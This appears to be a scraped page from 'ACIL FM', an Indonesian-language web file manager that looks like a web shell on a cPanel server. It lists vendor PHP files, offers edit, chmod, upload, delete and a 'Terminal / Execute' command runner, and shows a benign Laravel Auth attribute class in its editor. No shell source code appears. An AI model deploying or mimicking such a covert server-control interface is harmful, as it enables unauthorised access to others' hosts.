ACIL FM
Dark
Refresh
Current DIR:
/opt/cpanel/ea-wappspector/vendor/rector/rector/vendor/illuminate/container/Attributes
/
opt
cpanel
ea-wappspector
vendor
rector
rector
vendor
illuminate
container
Attributes
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
Auth.php
929 B
chmod
View
DL
Edit
Rename
Delete
Authenticated.php
928 B
chmod
View
DL
Edit
Rename
Delete
Cache.php
887 B
chmod
View
DL
Edit
Rename
Delete
Config.php
1003 B
chmod
View
DL
Edit
Rename
Delete
CurrentUser.php
178 B
chmod
View
DL
Edit
Rename
Delete
Database.php
918 B
chmod
View
DL
Edit
Rename
Delete
DB.php
164 B
chmod
View
DL
Edit
Rename
Delete
Log.php
881 B
chmod
View
DL
Edit
Rename
Delete
RouteParameter.php
876 B
chmod
View
DL
Edit
Rename
Delete
Storage.php
894 B
chmod
View
DL
Edit
Rename
Delete
Tag.php
787 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/cpanel/ea-wappspector/vendor/rector/rector/vendor/illuminate/container/Attributes/Auth.php
<?php namespace RectorPrefix202411\Illuminate\Container\Attributes; use Attribute; use RectorPrefix202411\Illuminate\Contracts\Container\Container; use RectorPrefix202411\Illuminate\Contracts\Container\ContextualAttribute; #[Attribute(Attribute::TARGET_PARAMETER)] class Auth implements ContextualAttribute { /** * @var string|null */ public $guard; /** * Create a new class instance. */ public function __construct(?string $guard = null) { $this->guard = $guard; } /** * Resolve the authentication guard. * * @param self $attribute * @param \Illuminate\Contracts\Container\Container $container * @return \Illuminate\Contracts\Auth\Guard|\Illuminate\Contracts\Auth\StatefulGuard */ public static function resolve(self $attribute, Container $container) { return $container->make('auth')->guard($attribute->guard); } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply